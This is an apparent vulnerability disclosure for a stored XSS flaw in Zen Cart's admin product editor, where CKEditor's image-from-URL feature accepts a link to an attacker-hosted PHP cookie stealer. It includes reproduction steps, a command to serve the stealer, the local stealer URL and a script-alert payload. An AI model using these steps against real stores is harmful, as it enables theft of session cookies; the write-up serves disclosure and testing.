Zencart | Stored XSS on adding products via SVG image

Zencart has an interesting feature that allows administrators to change the text editor used across the website for editing pages or products and gives them two choices to choose between a “Plain text” editor and “CKEditor”.

The problem is that CKEditor allows inserting images from a link, SVG images are blacklisted by default in Zencart. If you try upload a SVG file you will get errors but you can still insert a SVG file through CKEditor's “Insert image from URL" functionality.

In fact you can also insert .php malicious cookie grabbers and the application will treat it as an image which results in immediate trigger as soon as web page loads.

Reproduce

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.

Save the following file as capture.php:

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:

> php -S 0.0.0.0:1718

To reproduce this issue, change your Text Editor's type from Plain Text to CKEditor. You can make this change through [/index.php?cmd=define_pages_editor]

Once done, open a product for editing, the URI may look something like this:

[/index.php?cmd=product&page=1&cPath=1_4&product_type=1&pID=1&action=new_product]

Click “Insert image via URL” icon in CKEditor. A small window will appear asking for an image link but there are no filtering in place to ensure that users only use this feature to insert images and not something else.

Inside this small window, you can put the full link to your php cookie grabber, in my case it's the following:

http://127.0.0.1:1718/capture.php

Now you can visit the product and check your PHP server for cookie logs:

http://127.0.0.1/zencart/index.php?main_page=product_info&cPath=1_4&products_id=1

Additionally, the following payload works as well:

<script>alert("hacked")</script>